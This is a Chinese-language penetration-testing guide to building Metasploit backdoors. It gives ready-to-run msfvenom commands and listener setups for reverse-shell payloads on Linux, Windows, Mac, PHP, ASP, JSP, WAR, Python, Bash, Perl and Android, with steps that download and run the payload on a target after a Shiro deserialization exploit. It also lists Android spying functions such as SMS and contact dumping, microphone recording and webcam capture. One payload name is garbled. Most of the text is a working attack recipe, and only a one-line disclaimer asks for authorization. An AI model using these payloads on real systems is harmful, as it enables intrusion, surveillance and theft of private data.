初识MSF后门技术
字数 1040 2025-08-20 18:18:10

MSF后门技术全面指南

0x01 前言

后门技术是渗透测试中至关重要的环节,本文详细记录使用Metasploit Framework(MSF)生成各类后门的实战技术,涵盖Linux、Windows、PHP、JSP、ASP以及Android平台的后门生成与利用方法。

0x02 MSF生成Linux后门实战

实战背景

  • 目标系统:使用Shiro框架的登录界面
  • 漏洞利用:Shiro反序列化漏洞

利用Shiro反序列化漏洞

  1. 使用Burpsuite抓包识别Shiro特征字段
  2. 使用专用工具检测并确认漏洞存在
  3. 成功反弹shell

植入Linux后门流程

生成后门

msfconsole
use exploit/multi/handler
set lhost xxx.xxx.xxx.xxx
set lport 9991
set payload linux/x86/meterpreter/reverse_tcp
run

目标机操作

wget http://xxx.xxx.xxx/shell
chmod 777 shell
./shell

0x03 MSF生成Windows后门

实验环境

  • 攻击机:个人VPS
  • 靶机:Windows Server 2012

生成Windows后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f exe > shell.exe

MSF监听配置

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Your IP>
set LPORT <Your Port>
run

0x04 MSF生成PHP后门

实验环境

  • 攻击机:个人VPS
  • 靶机:CentOS系统

生成PHP后门

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f raw > text.php

目标机操作

wget http://xxx.xxx.xxx/text.php
php ./text.php

0x05 MSF生成Android后门

实验环境

  • 攻击机:个人VPS
  • 靶机:夜神安卓模拟器

生成Android后门

msfvenom -p android/meterpreter/reverse_tcp LHOST=your_ip LPORT=your_port R > /root/android.apk

Android后门功能

  • check_root - 检查root权限
  • dump_calllog - 下载通讯记录
  • dump_contacts - 下载联系人
  • dump_sms - 下载短信
  • send_sms - 发送短信
  • record_mic - 录音
  • webcam_list - 查看摄像头
  • webcam_snap - 拍照
  • webcam_stream - 连续拍照
  • geolocate - 获取地理位置
  • upload - 上传文件
  • download - 下载文件
  • shell - 获取shell

0x06 MSF生成各类后门总结

Binaries后门

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f exe > shell.exe

Mac

msfvenom -p osx/x86ell_reverse_tcp LHOST=<IP> LPORT=<Port> -f macho > shell.macho

Web Payloads

PHP

msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f raw > shell.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f war > shell.war

Scripting Payloads

Python

msfvenom -p cmd/unix/reverse_python LHOST=<IP> LPORT=<Port> -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=<IP> LPORT=<Port> -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<IP> LPORT=<Port> -f raw > shell.pl

Shellcode生成

使用msfvenom --help-formats查看支持的格式参数

Linux Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f <language>

Windows Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f <language>

Mac Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f <language>

注意事项

  1. 实际使用时需替换<IP><Port>为实际值
  2. 本文仅用于学习研究,请遵守法律法规
  3. 实际渗透测试需获得授权方可进行

参考资源

  1. MSFvenom使用指南
  2. 渗透测试技术博客
MSF后门技术全面指南 0x01 前言 后门技术是渗透测试中至关重要的环节,本文详细记录使用Metasploit Framework(MSF)生成各类后门的实战技术,涵盖Linux、Windows、PHP、JSP、ASP以及Android平台的后门生成与利用方法。 0x02 MSF生成Linux后门实战 实战背景 目标系统:使用Shiro框架的登录界面 漏洞利用:Shiro反序列化漏洞 利用Shiro反序列化漏洞 使用Burpsuite抓包识别Shiro特征字段 使用专用工具检测并确认漏洞存在 成功反弹shell 植入Linux后门流程 生成后门 目标机操作 0x03 MSF生成Windows后门 实验环境 攻击机:个人VPS 靶机:Windows Server 2012 生成Windows后门 MSF监听配置 0x04 MSF生成PHP后门 实验环境 攻击机:个人VPS 靶机:CentOS系统 生成PHP后门 目标机操作 0x05 MSF生成Android后门 实验环境 攻击机:个人VPS 靶机:夜神安卓模拟器 生成Android后门 Android后门功能 check_root - 检查root权限 dump_calllog - 下载通讯记录 dump_contacts - 下载联系人 dump_sms - 下载短信 send_sms - 发送短信 record_mic - 录音 webcam_list - 查看摄像头 webcam_snap - 拍照 webcam_stream - 连续拍照 geolocate - 获取地理位置 upload - 上传文件 download - 下载文件 shell - 获取shell 0x06 MSF生成各类后门总结 Binaries后门 Linux Windows Mac Web Payloads PHP ASP JSP WAR Scripting Payloads Python Bash Perl Shellcode生成 使用 msfvenom --help-formats 查看支持的格式参数 Linux Shellcode Windows Shellcode Mac Shellcode 注意事项 实际使用时需替换 <IP> 和 <Port> 为实际值 本文仅用于学习研究,请遵守法律法规 实际渗透测试需获得授权方可进行 参考资源 MSFvenom使用指南 渗透测试技术博客